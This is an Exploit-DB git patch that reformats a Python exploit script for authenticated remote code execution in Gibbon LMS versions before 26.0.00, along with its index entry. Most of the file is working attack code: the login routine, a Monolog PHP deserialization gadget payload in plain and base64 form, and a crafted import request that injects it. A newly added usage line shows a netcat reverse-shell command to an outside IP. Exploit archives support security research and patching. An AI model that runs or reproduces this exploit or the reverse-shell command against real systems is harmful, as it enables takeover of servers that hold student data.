From 323c36e8313a6f0e6a24fd1b17975bb9b1ffb8a1 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Thu, 16 May 2024 00:16:39 +0000
Subject: [PATCH] DB: 2024-05-16

2 changes to exploits/shellcodes/ghdb

Gibbon LMS < v26.0.00 - Authenticated RCE
---
 exploits/php/webapps/51903.py | 82 ++++++++---------------------------
 files_exploits.csv            |  2 +-
 2 files changed, 18 insertions(+), 66 deletions(-)

diff --git a/exploits/php/webapps/51903.py b/exploits/php/webapps/51903.py
index 625741e047..b4f9b93ce6 100755
--- a/exploits/php/webapps/51903.py
+++ b/exploits/php/webapps/51903.py
@@ -1,8 +1,6 @@
-# Exploit Title: Gibbon LMS has a PHP Deserialization vulnerability on
-the v26.0.00 version
+# Exploit Title: Gibbon LMS has a PHP Deserialization vulnerability on the v26.0.00 version
 # Date: 22.01.2024
-# Exploit Author: SecondX.io Research Team(Ali Maharramli,Fikrat
-Guliev,Islam Rzayev )
+# Exploit Author: SecondX.io Research Team(Ali Maharramli,Fikrat Guliev,Islam Rzayev )
 # Vendor Homepage: https://gibbonedu.org/
 # Software Link: https://github.com/GibbonEdu/core
 # Version: v26.0.00
@@ -18,27 +16,13 @@
 
 def login(target_host, target_port,email,password):
      url = f'http://{target_host}:{target_port}/login.php?timeout=true'
-     headers = {"Content-Type": "multipart/form-data;
-boundary=---------------------------174475955731268836341556039466"}
-     data =
-f"-----------------------------174475955731268836341556039466\r\nContent-Disposition:
-form-data;
-name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
-form-data;
-name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
-form-data;
-name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
-form-data;
-name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
-form-data;
-name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
-form-data;
-name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"
-     r = requests.post(url, headers=headers, data=data,
-allow_redirects=False)
+     headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"}
+     data = f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"
+     r = requests.post(url, headers=headers, data=data, allow_redirects=False)
+     print(url)
+     print(r.headers)
      Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie'])
-     if Session_Cookie[4] is not None and '/index.php' in
-str(r.headers['Location']):
+     if Session_Cookie[4] is not None and '/index.php' in str(r.headers['Location']):
          print("[X] Login successful!")
 
      return Session_Cookie[4]
@@ -49,10 +33,8 @@ def generate_payload(command):
 
      # Given base64-encoded string
      ### Actual Payload:
-     ###
-a:2:{i:7%3BO:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"%00*%00socket"%3BO:29:"Monolog\Handler\BufferHandler":7:{s:10:"%00*%00handler"%3Br:3%3Bs:13:"%00*%00bufferSize"%3Bi:-1%3Bs:9:"%00*%00buffer"%3Ba:1:{i:0%3Ba:2:{i:0%3Bs:COMMAND_SIZE:"COMMAND"%3Bs:5:"level"%3BN%3B}}s:8:"%00*%00level"%3BN%3Bs:14:"%00*%00initialized"%3Bb:1%3Bs:14:"%00*%00bufferLimit"%3Bi:-1%3Bs:13:"%00*%00processors"%3Ba:2:{i:0%3Bs:7:"current"%3Bi:1%3Bs:6:"system"%3B}}}i:7%3Bi:7%3B}
-     base64_encoded_string =
-'YToyOntpOjclM0JPOjMyOiJNb25vbG9nXEhhbmRsZXJcU3lzbG9nVWRwSGFuZGxlciI6MTp7czo5OiIlMDAqJTAwc29ja2V0IiUzQk86Mjk6Ik1vbm9sb2dcSGFuZGxlclxCdWZmZXJIYW5kbGVyIjo3OntzOjEwOiIlMDAqJTAwaGFuZGxlciIlM0JyOjMlM0JzOjEzOiIlMDAqJTAwYnVmZmVyU2l6ZSIlM0JpOi0xJTNCczo5OiIlMDAqJTAwYnVmZmVyIiUzQmE6MTp7aTowJTNCYToyOntpOjAlM0JzOkNPTU1BTkRfU0laRToiQ09NTUFORCIlM0JzOjU6ImxldmVsIiUzQk4lM0J9fXM6ODoiJTAwKiUwMGxldmVsIiUzQk4lM0JzOjE0OiIlMDAqJTAwaW5pdGlhbGl6ZWQiJTNCYjoxJTNCczoxNDoiJTAwKiUwMGJ1ZmZlckxpbWl0IiUzQmk6LTElM0JzOjEzOiIlMDAqJTAwcHJvY2Vzc29ycyIlM0JhOjI6e2k6MCUzQnM6NzoiY3VycmVudCIlM0JpOjElM0JzOjY6InN5c3RlbSIlM0J9fX1pOjclM0JpOjclM0J9'
+     ### a:2:{i:7%3BO:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"%00*%00socket"%3BO:29:"Monolog\Handler\BufferHandler":7:{s:10:"%00*%00handler"%3Br:3%3Bs:13:"%00*%00bufferSize"%3Bi:-1%3Bs:9:"%00*%00buffer"%3Ba:1:{i:0%3Ba:2:{i:0%3Bs:COMMAND_SIZE:"COMMAND"%3Bs:5:"level"%3BN%3B}}s:8:"%00*%00level"%3BN%3Bs:14:"%00*%00initialized"%3Bb:1%3Bs:14:"%00*%00bufferLimit"%3Bi:-1%3Bs:13:"%00*%00processors"%3Ba:2:{i:0%3Bs:7:"current"%3Bi:1%3Bs:6:"system"%3B}}}i:7%3Bi:7%3B}
+     base64_encoded_string = 'YToyOntpOjclM0JPOjMyOiJNb25vbG9nXEhhbmRsZXJcU3lzbG9nVWRwSGFuZGxlciI6MTp7czo5OiIlMDAqJTAwc29ja2V0IiUzQk86Mjk6Ik1vbm9sb2dcSGFuZGxlclxCdWZmZXJIYW5kbGVyIjo3OntzOjEwOiIlMDAqJTAwaGFuZGxlciIlM0JyOjMlM0JzOjEzOiIlMDAqJTAwYnVmZmVyU2l6ZSIlM0JpOi0xJTNCczo5OiIlMDAqJTAwYnVmZmVyIiUzQmE6MTp7aTowJTNCYToyOntpOjAlM0JzOkNPTU1BTkRfU0laRToiQ09NTUFORCIlM0JzOjU6ImxldmVsIiUzQk4lM0J9fXM6ODoiJTAwKiUwMGxldmVsIiUzQk4lM0JzOjE0OiIlMDAqJTAwaW5pdGlhbGl6ZWQiJTNCYjoxJTNCczoxNDoiJTAwKiUwMGJ1ZmZlckxpbWl0IiUzQmk6LTElM0JzOjEzOiIlMDAqJTAwcHJvY2Vzc29ycyIlM0JhOjI6e2k6MCUzQnM6NzoiY3VycmVudCIlM0JpOjElM0JzOjY6InN5c3RlbSIlM0J9fX1pOjclM0JpOjclM0J9'
 
      command_size = len(command)
 
@@ -71,42 +53,12 @@ def generate_payload(command):
 
 
 def rce(cookie, target_host, target_port, command):
-     url =
-f'http://{target_host}:{target_port}/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'
-     headers = {"Content-Type": "multipart/form-data;
-boundary=---------------------------104550429928543086952438317710","Cookie":
-cookie}
+     url = f'http://{target_host}:{target_port}/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'
+     headers = {"Content-Type": "multipart/form-data; boundary=---------------------------104550429928543086952438317710","Cookie": cookie}
      payload = generate_payload(command)
-     data =
-f'-----------------------------104550429928543086952438317710\r\nContent-Disposition:
-form-data; name="address"\r\n\r\n/modules/System
-Admin/import_run.php\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
-form-data;
-name="mode"\r\n\r\nsync\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
-form-data;
-name="syncField"\r\n\r\nN\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
-form-data;
-name="syncColumn"\r\n\r\n\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
-form-data;
-name="columnOrder"\r\n\r\n{payload}\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
-form-data;
-name="columnText"\r\n\r\nN;\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
-form-data;
-name="fieldDelimiter"\r\n\r\n%2C\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
-form-data;
-name="stringEnclosure"\r\n\r\n%22\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
-form-data;
-name="filename"\r\n\r\nDataStructure-externalAssessment.xlsx\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
-form-data; name="csvData"\r\n\r\n"External Assessment","Assessment
-Date","Student","Field Name Category","Field
-Name","Result"\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
-form-data;
-name="ignoreErrors"\r\n\r\n1\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
-form-data;
-name="Failed"\r\n\r\nSubmit\r\n-----------------------------104550429928543086952438317710--'
-
-     r = requests.post(url, headers=headers, data=data,
-allow_redirects=False)
+     data = f'-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="address"\r\n\r\n/modules/System Admin/import_run.php\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="mode"\r\n\r\nsync\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="syncField"\r\n\r\nN\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="syncColumn"\r\n\r\n\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="columnOrder"\r\n\r\n{payload}\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:form-data; name="columnText"\r\n\r\nN;\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="fieldDelimiter"\r\n\r\n%2C\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="stringEnclosure"\r\n\r\n%22\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="filename"\r\n\r\nDataStructure-externalAssessment.xlsx\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="csvData"\r\n\r\n"External Assessment","Assessment Date","Student","Field Name Category","Field Name","Result"\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="ignoreErrors"\r\n\r\n1\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="Failed"\r\n\r\nSubmit\r\n-----------------------------104550429928543086952438317710--'
+
+     r = requests.post(url, headers=headers, data=data, allow_redirects=False)
      print("[X] Request sent!")
 
      start_index = r.text.find("<h2>Step 4 - Live Run</h2>")
@@ -122,8 +74,8 @@ def rce(cookie, target_host, target_port, command):
 
 if __name__ == '__main__':
      if len(sys.argv) != 6:
-         print("[X] Usage: script.py <target_host> <target_port> <email>
-<password> <command>")
+         print("[X] Usage: script.py <target_host> <target_port/url> <email> <password> <command>")
+         print("[X] Example: python gibbon_rce.py 192.168.1.100 80/gibbon test.email@localhost.com password1 \"./nc -e /bin/bash 172.28.218.3 4444\"")
          sys.exit(1)
      cookie = login(sys.argv[1], sys.argv[2],sys.argv[3],sys.argv[4])
      rce(cookie, sys.argv[1], sys.argv[2], sys.argv[5])
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 58d927a2f4..3b4f231fb9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -19259,7 +19259,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 4404,exploits/php/webapps/4404.txt,"GForge < 4.6b2 - 'skill_delete' SQL Injection",2007-09-13,"Sumit Siddharth",webapps,php,,2007-09-12,2016-12-26,1,OSVDB-37031;CVE-2007-4966;CVE-2007-3913,,,,,
 3271,exploits/php/webapps/3271.php,"GGCMS 1.1.0 RC1 - Remote Code Execution",2007-02-05,Kacper,webapps,php,,2007-02-04,,1,OSVDB-35849;CVE-2007-0804,,,,,
 26653,exploits/php/webapps/26653.txt,"GhostScripter Amazon Shop 5.0 - 'search.php' SQL Injection",2005-11-29,r0t,webapps,php,,2005-11-29,2013-07-07,1,CVE-2005-3908;OSVDB-21371,,,,,https://www.securityfocus.com/bid/15634/info
-51903,exploits/php/webapps/51903.py,"Gibbon LMS < v26.0.00 - Authenticated RCE",2024-03-18,"Ali Maharramli_Fikrat  Guliev_Islam Rzayev",webapps,php,,2024-03-18,2024-03-18,0,,,,,,
+51903,exploits/php/webapps/51903.py,"Gibbon LMS < v26.0.00 - Authenticated RCE",2024-03-18,"Ali Maharramli_Fikrat  Guliev_Islam Rzayev",webapps,php,,2024-03-18,2024-05-15,0,,,,,,
 51962,exploits/php/webapps/51962.txt,"Gibbon LMS v26.0.00 - SSTI vulnerability",2024-04-02,"Ali Maharramli_Fikrat  Guliev_Islam Rzayev",webapps,php,,2024-04-02,2024-04-02,0,CVE-2024-24724,,,,,
 42442,exploits/php/webapps/42442.txt,"GIF Collection 2.0 - SQL Injection",2017-08-10,"Ihsan Sencan",webapps,php,,2017-08-10,2017-08-10,0,,,,,,
 44718,exploits/php/webapps/44718.txt,"Gigs 2.0 - 'username' SQL Injection",2018-05-23,AkkuS,webapps,php,,2018-05-23,2018-05-23,0,,,,,,